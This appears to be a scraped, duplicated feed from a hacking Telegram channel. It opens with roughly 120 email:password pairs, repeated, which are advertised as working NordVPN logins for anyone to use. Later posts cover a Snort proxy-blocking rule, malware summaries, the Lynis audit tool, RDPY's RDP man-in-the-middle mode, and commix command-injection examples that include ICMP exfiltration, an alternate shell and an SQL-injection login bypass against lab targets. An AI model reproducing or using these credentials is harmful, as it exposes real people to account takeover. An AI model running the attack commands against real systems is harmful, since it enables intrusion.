β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them
colin.bard43@hotmail.com:Chester13
hamilton93111@yahoo.com:amanda931
jziemba2013@gmail.com:yankees1
kkennedy22@gmail.com:Duff0022
mdcopestake@gmail.com:lollipop
narrow_path101@yahoo.com:ironchef09
natebegonia@yahoo.com:shifty4u
nicholas.hammer1@gmail.com:Nick4477
nickelpfeiffer@gmail.com:blink182
oliver.turrell@gmail.com:millwall100
parkerh101@gmail.com:05251994
whatsthesignal@gmail.com:smithers
wonaboveu@gmail.com:01durango
alec.maybarduk@gmail.com:Tony1989
aniya456@icloud.com:Samari01
autumnjames01@icloud.com:autumn01
ch33ky1974@gmail.com:Madison2007
christiansravn@yahoo.de:Marcel12
clmisp@yahoo.com:Un1versa1
csinghavong@gmail.com:nothing123
glowther@me.com:Builder7
govannig88@gmail.com:Tahoe888
hudsonjordan682@gmail.com:ilovebaseball
ian.felter@yahoo.com:Rockstar1
jaderquist@yahoo.com:Fender1969
jdeaugu@gmail.com:Banker11
jermierio@gmail.com:Fatz3289
jowaskett@hotmail.com:Rainbow1982
lgaddis24@gmail.com:5568Sasha
lilly.byrne12@yahoo.com:texasstars
pacobden1@bigpond.com:97966695
pho3nix182@gmail.com:master182
shawka3105@gmail.com:korkycat2
t.bergervoet@gmail.com:Media321
tbloomq595@aol.com:Bloomie1
tfabre2@gmail.com:zoloft123
thor101276@gmail.com:Tazz9314
tom.goodens@gmail.com:Bugatti12
zane_heavner@yahoo.com:Hobbs123
a.david227@gmail.com:bumba123
angelorios@me.com:1hlo9b10
basham02@msn.com:Starwars1
borthwickchris@hotmail.com:Thought12
cellinghausen@gmail.com:polo1234
chasev@live.com:Giants4848
co_wrx@hotmail.com:karen001
dsvettrus@hotmail.com:Sierra13
gmoney_94590@yahoo.com:Lowride1
jakki.o.brien@hotmail.co.uk:Sophie01
jeffhaynes619@gmail.com:buzzer
jensterle.anze@gmail.com:anze0255
johnjrreil@gmail.com:Archie12
doogiemc1966@gmail.com:Charlton1905
djmiosibuffalo@gmail.com:monkmonk1
jerichosantiago1@gmail.com:23rmitkb
henrydeuel@gmail.com:hd522194
stefan.schwindl@gmx.de:P3294z4h
johnjcharlesworth@gmail.com:Pokemon123
priyamshah95@gmail.com:chikoo40
joshlambert1590@yahoo.com:Brahma25
tripp.welge@gmail.com:thurlow84
clara357@gmail.com:horse1021
govindarumi@gmail.com:Twenty20
www.ducker60@gmail.com:Michon26
mickwooly@hotmail.com:3manc1manu
gregoire.caboche@gmail.com:Biniouse123
justin.joon.yang@gmail.com:4hamashika
calpurnia53@gmail.com:lrbk53019
christianpmorgan@live.com:Mexico08
mdking97@gmail.com:9k12ak12337
fabi_warcrafgt@hotmail.com:fgt123war321
joe.saouma@gmail.com:11097c4da
dhanishs.soni@gmail.com:dhanish9199
mmcyj1@aol.com:skippy12
nkatakura1@gmail.com:kata73247
cherise-mayte@hotmail.com:Lincoln1
lewisproctor7@gmail.com:rooney07
crow.stephen@gmail.com:savior11
wings_ting@hotmail.com:y0430232
nehmerabih@hotmail.com:03953538
kajcampbell@sbcglobal.net:kajl1040
Lucas@saugmann.dk:Farogmor123
kobilee98@hotmail.com:Delldell12
khatib_elboss1@hotmail.com:elhenry14
horsejay2003@gmail.com:Swimmer4
thecheeseapache@hotmail.com:79264833pc
treyturner74@gmail.com:Corvette14
adam_bonham4@hotmail.com:zero1644
berjali@gmail.com:maryama2011
spmantor@yahoo.com:spm060587
benedict3121@gmail.com:wanderlust
ericklanda423@gmail.com:171623El
razielphisher@gmail.com:Lancas7er
aaronjbreuer@yahoo.com:k2M93pyW
sean-peck@hotmail.com:sp16ae78
torabi142003@yahoo.de:Midda1350
terrynwf@hotmail.com:selina00
difranco.michael@gmail.com:Michael1
christopherconrell@gmail.com:kansas9904
alexsander-veiby@hotmail.com:Banjokazooie99
egarstad@gmail.com:VutRa4aW
zachsaddress03@gmail.com:Zach2003
sethdymoke@gmail.com:Laxbro10
curtgaebriel@gmail.com:Aiypwzqp1996
josef.bremberger@googlemail.com:Avalanche123
john.van.krieken@live.com:andrew16
zacottaway@gmail.com:Starwars10
mikewsm.15@gmail.com:Monster15
alvaradonestor7@gmail.com:Buddha420
Jalal.X@gmail.com:Kenshin13
alfredocmarques@gmail.com:2am707mr
nicolas.dontschev@gmail.com:plumeplume0
prathapan@gmail.com:Sabara12
autisticsheep.com@gmail.com:Soccer03
dustin_mustach@yahoo.com:Dnmdaman123
bonurozdemir@gmail.com:17agustoS
bakobanmana@gmail.com:Phantom1
mattmix@bluemavid.com:visV5kapr3
kevinscripture@hotmail.com:Eyes2020
ruth.ruckle@gmail.com:children3
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them
colin.bard43@hotmail.com:Chester13
hamilton93111@yahoo.com:amanda931
jziemba2013@gmail.com:yankees1
kkennedy22@gmail.com:Duff0022
mdcopestake@gmail.com:lollipop
narrow_path101@yahoo.com:ironchef09
natebegonia@yahoo.com:shifty4u
nicholas.hammer1@gmail.com:Nick4477
nickelpfeiffer@gmail.com:blink182
oliver.turrell@gmail.com:millwall100
parkerh101@gmail.com:05251994
whatsthesignal@gmail.com:smithers
wonaboveu@gmail.com:01durango
alec.maybarduk@gmail.com:Tony1989
aniya456@icloud.com:Samari01
autumnjames01@icloud.com:autumn01
ch33ky1974@gmail.com:Madison2007
christiansravn@yahoo.de:Marcel12
clmisp@yahoo.com:Un1versa1
csinghavong@gmail.com:nothing123
glowther@me.com:Builder7
govannig88@gmail.com:Tahoe888
hudsonjordan682@gmail.com:ilovebaseball
ian.felter@yahoo.com:Rockstar1
jaderquist@yahoo.com:Fender1969
jdeaugu@gmail.com:Banker11
jermierio@gmail.com:Fatz3289
jowaskett@hotmail.com:Rainbow1982
lgaddis24@gmail.com:5568Sasha
lilly.byrne12@yahoo.com:texasstars
pacobden1@bigpond.com:97966695
pho3nix182@gmail.com:master182
shawka3105@gmail.com:korkycat2
t.bergervoet@gmail.com:Media321
tbloomq595@aol.com:Bloomie1
tfabre2@gmail.com:zoloft123
thor101276@gmail.com:Tazz9314
tom.goodens@gmail.com:Bugatti12
zane_heavner@yahoo.com:Hobbs123
a.david227@gmail.com:bumba123
angelorios@me.com:1hlo9b10
basham02@msn.com:Starwars1
borthwickchris@hotmail.com:Thought12
cellinghausen@gmail.com:polo1234
chasev@live.com:Giants4848
co_wrx@hotmail.com:karen001
dsvettrus@hotmail.com:Sierra13
gmoney_94590@yahoo.com:Lowride1
jakki.o.brien@hotmail.co.uk:Sophie01
jeffhaynes619@gmail.com:buzzer
jensterle.anze@gmail.com:anze0255
johnjrreil@gmail.com:Archie12
doogiemc1966@gmail.com:Charlton1905
djmiosibuffalo@gmail.com:monkmonk1
jerichosantiago1@gmail.com:23rmitkb
henrydeuel@gmail.com:hd522194
stefan.schwindl@gmx.de:P3294z4h
johnjcharlesworth@gmail.com:Pokemon123
priyamshah95@gmail.com:chikoo40
joshlambert1590@yahoo.com:Brahma25
tripp.welge@gmail.com:thurlow84
clara357@gmail.com:horse1021
govindarumi@gmail.com:Twenty20
www.ducker60@gmail.com:Michon26
mickwooly@hotmail.com:3manc1manu
gregoire.caboche@gmail.com:Biniouse123
justin.joon.yang@gmail.com:4hamashika
calpurnia53@gmail.com:lrbk53019
christianpmorgan@live.com:Mexico08
mdking97@gmail.com:9k12ak12337
fabi_warcrafgt@hotmail.com:fgt123war321
joe.saouma@gmail.com:11097c4da
dhanishs.soni@gmail.com:dhanish9199
mmcyj1@aol.com:skippy12
nkatakura1@gmail.com:kata73247
cherise-mayte@hotmail.com:Lincoln1
lewisproctor7@gmail.com:rooney07
crow.stephen@gmail.com:savior11
wings_ting@hotmail.com:y0430232
nehmerabih@hotmail.com:03953538
kajcampbell@sbcglobal.net:kajl1040
Lucas@saugmann.dk:Farogmor123
kobilee98@hotmail.com:Delldell12
khatib_elboss1@hotmail.com:elhenry14
horsejay2003@gmail.com:Swimmer4
thecheeseapache@hotmail.com:79264833pc
treyturner74@gmail.com:Corvette14
adam_bonham4@hotmail.com:zero1644
berjali@gmail.com:maryama2011
spmantor@yahoo.com:spm060587
benedict3121@gmail.com:wanderlust
ericklanda423@gmail.com:171623El
razielphisher@gmail.com:Lancas7er
aaronjbreuer@yahoo.com:k2M93pyW
sean-peck@hotmail.com:sp16ae78
torabi142003@yahoo.de:Midda1350
terrynwf@hotmail.com:selina00
difranco.michael@gmail.com:Michael1
christopherconrell@gmail.com:kansas9904
alexsander-veiby@hotmail.com:Banjokazooie99
egarstad@gmail.com:VutRa4aW
zachsaddress03@gmail.com:Zach2003
sethdymoke@gmail.com:Laxbro10
curtgaebriel@gmail.com:Aiypwzqp1996
josef.bremberger@googlemail.com:Avalanche123
john.van.krieken@live.com:andrew16
zacottaway@gmail.com:Starwars10
mikewsm.15@gmail.com:Monster15
alvaradonestor7@gmail.com:Buddha420
Jalal.X@gmail.com:Kenshin13
alfredocmarques@gmail.com:2am707mr
nicolas.dontschev@gmail.com:plumeplume0
prathapan@gmail.com:Sabara12
autisticsheep.com@gmail.com:Soccer03
dustin_mustach@yahoo.com:Dnmdaman123
bonurozdemir@gmail.com:17agustoS
bakobanmana@gmail.com:Phantom1
mattmix@bluemavid.com:visV5kapr3
kevinscripture@hotmail.com:Eyes2020
ruth.ruckle@gmail.com:children3
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them & send me screanshoat :)
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them & send me screanshoat :)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Network configuration-Prevent users from browsing using external proxies :
> Some background knowledge:
1) HTTP / 1.0 protocol defines web server and When the client uses a proxy, in the
HTTP request and response header, use Via: to identify the proxy server used to prevent the
server loop;
2) snort is an open source IDS (intrusion detection system) that can be used Host or network IDS. With many IDS
rules, it can perform pattern recognition and matching on the captured (ip, tcp, udp, icmp) packets, and can generate corresponding records.
3) libnet is open source software that can be used as a network protocol / packet generator.
4) The TCP / IP network is a packet-switched network.
5) Snort also has the function of generating IP packets using the libnet library. You can interrupt the TCP connection by issuing a TCP_RESET packet.
π¦ Prerequisites:
1) Snort runs on the route (linux) or through the port mirror function of the switch, runs on the same
network segment of the route
π¦ Implementation:
1) compile snort with flexresp (flex response) feature
2) Define snort rules:
alert tcp $ HOME_NET any <> $ EXTER_NET 80 (msg: "block proxy"; uricontent: "Via:"; resp: rst_all;)
π¦ Effect:
Internal network users can browse external websites normally. If the internal user βs browser is configured with an external proxy, the
HTTP REQUEST and RESPONSE headers will include Via: ... characters, and snort rules will capture this connection, and then
Send RST packets to client and server sockets. In this way, the TCP connection is terminated.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Network configuration-Prevent users from browsing using external proxies :
> Some background knowledge:
1) HTTP / 1.0 protocol defines web server and When the client uses a proxy, in the
HTTP request and response header, use Via: to identify the proxy server used to prevent the
server loop;
2) snort is an open source IDS (intrusion detection system) that can be used Host or network IDS. With many IDS
rules, it can perform pattern recognition and matching on the captured (ip, tcp, udp, icmp) packets, and can generate corresponding records.
3) libnet is open source software that can be used as a network protocol / packet generator.
4) The TCP / IP network is a packet-switched network.
5) Snort also has the function of generating IP packets using the libnet library. You can interrupt the TCP connection by issuing a TCP_RESET packet.
π¦ Prerequisites:
1) Snort runs on the route (linux) or through the port mirror function of the switch, runs on the same
network segment of the route
π¦ Implementation:
1) compile snort with flexresp (flex response) feature
2) Define snort rules:
alert tcp $ HOME_NET any <> $ EXTER_NET 80 (msg: "block proxy"; uricontent: "Via:"; resp: rst_all;)
π¦ Effect:
Internal network users can browse external websites normally. If the internal user βs browser is configured with an external proxy, the
HTTP REQUEST and RESPONSE headers will include Via: ... characters, and snort rules will capture this connection, and then
Send RST packets to client and server sockets. In this way, the TCP connection is terminated.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-the arrival of home network by undercode:
> Today, the number of home PCs has inevitably exceeded one. Usually, when we upgrade us After the machine, or after giving the child one, or the wife bringing back one to work, we have more than one computer at home. Anyway, in the end we will have a bunch of machines.
π¦ ππΌππ πππΈβπ :
The following is a list of the functions that the network solution has, including Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:
Linux Unix NT Win95 Mac OS / 2
Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *
------------ -------------------------------------------------- ------------------
x Supported by the system itself
* Need additional support
-not supported
After comparison of chart functions, some systems have been disregarded. If you are not using this It βs a pity, but it βs best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-the arrival of home network by undercode:
> Today, the number of home PCs has inevitably exceeded one. Usually, when we upgrade us After the machine, or after giving the child one, or the wife bringing back one to work, we have more than one computer at home. Anyway, in the end we will have a bunch of machines.
π¦ ππΌππ πππΈβπ :
The following is a list of the functions that the network solution has, including Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:
Linux Unix NT Win95 Mac OS / 2
Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *
------------ -------------------------------------------------- ------------------
x Supported by the system itself
* Need additional support
-not supported
After comparison of chart functions, some systems have been disregarded. If you are not using this It βs a pity, but it βs best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TOP ACTIVE MALWARES IN 2020 :
T.me/UndercodeTesting
1) Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.
2) WannaCry is a ransomware cryptoworm using the EternalBlue exploit to spread via SMB protocol. Version 1.0 has a βkillswitchβ domain, which stops the encryption process.
3) Kovter is a fileless click fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and uses hooks within certain APIs for persistence.
4) ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants adopted parts of itβs codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.
5) Dridex is a malware banking variant that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns
6) IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victimβs online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers
7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device
8) Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TOP ACTIVE MALWARES IN 2020 :
T.me/UndercodeTesting
1) Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.
2) WannaCry is a ransomware cryptoworm using the EternalBlue exploit to spread via SMB protocol. Version 1.0 has a βkillswitchβ domain, which stops the encryption process.
3) Kovter is a fileless click fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and uses hooks within certain APIs for persistence.
4) ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants adopted parts of itβs codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.
5) Dridex is a malware banking variant that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns
6) IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victimβs online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers
7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device
8) Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated wifi hacking- Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional
π¦FEATURES :
Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/CISOfy/lynis
Execute:
2) cd lynis; ./lynis audit system
3) If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
π¦MORE :
Parameter Abbreviated Description
--auditor "Name" Assign an auditor name to the audit (report)
--checkall -c Start the check
--check-update Check if Lynis is up-to-date
--cronjob Run Lynis as cronjob (includes -c -Q)
--help -h Shows valid parameters
--manpage View man page
--nocolors Do not use any colors
--pentest Perform a penetration test scan (non-privileged)
--quick -Q Don't wait for user input, except on errors
--quiet Only show warnings (includes --quick, but doesn't wait)
--reverse-colors Use a different color scheme for light backgrounds
--version -V Check program version (and quit)
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated wifi hacking- Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional
π¦FEATURES :
Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/CISOfy/lynis
Execute:
2) cd lynis; ./lynis audit system
3) If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
π¦MORE :
Parameter Abbreviated Description
--auditor "Name" Assign an auditor name to the audit (report)
--checkall -c Start the check
--check-update Check if Lynis is up-to-date
--cronjob Run Lynis as cronjob (includes -c -Q)
--help -h Shows valid parameters
--manpage View man page
--nocolors Do not use any colors
--pentest Perform a penetration test scan (non-privileged)
--quick -Q Don't wait for user input, except on errors
--quiet Only show warnings (includes --quick, but doesn't wait)
--reverse-colors Use a different color scheme for light backgrounds
--version -V Check program version (and quit)
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - CISOfy/lynis: Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testingβ¦
Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional. - CISOf...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 rdp Remote Desktop Protocol :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).
twitter.com/undercodeNews
π¦ FEATURES :
RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player
π¦πβπππΈπππππΈπππβ & βπβ :
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
$ python rdpy/setup.py install
Or use PIP:
$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
π¦COMMANDS :
rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .
$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.
$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.
$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.
$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.
rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa
π¦ TESTED BY UNDERCODE
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 rdp Remote Desktop Protocol :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).
twitter.com/undercodeNews
π¦ FEATURES :
RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player
π¦πβπππΈπππππΈπππβ & βπβ :
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
$ python rdpy/setup.py install
Or use PIP:
$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
π¦COMMANDS :
rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .
$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.
$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.
$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.
$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.
rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa
π¦ TESTED BY UNDERCODE
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED Automated All-in-One OS command injection and exploitation tool.
fb.com/undercodeTesting
π¦SUPPORTED OS :
ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) python commix.py -h
π¦COMMANDS :
1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
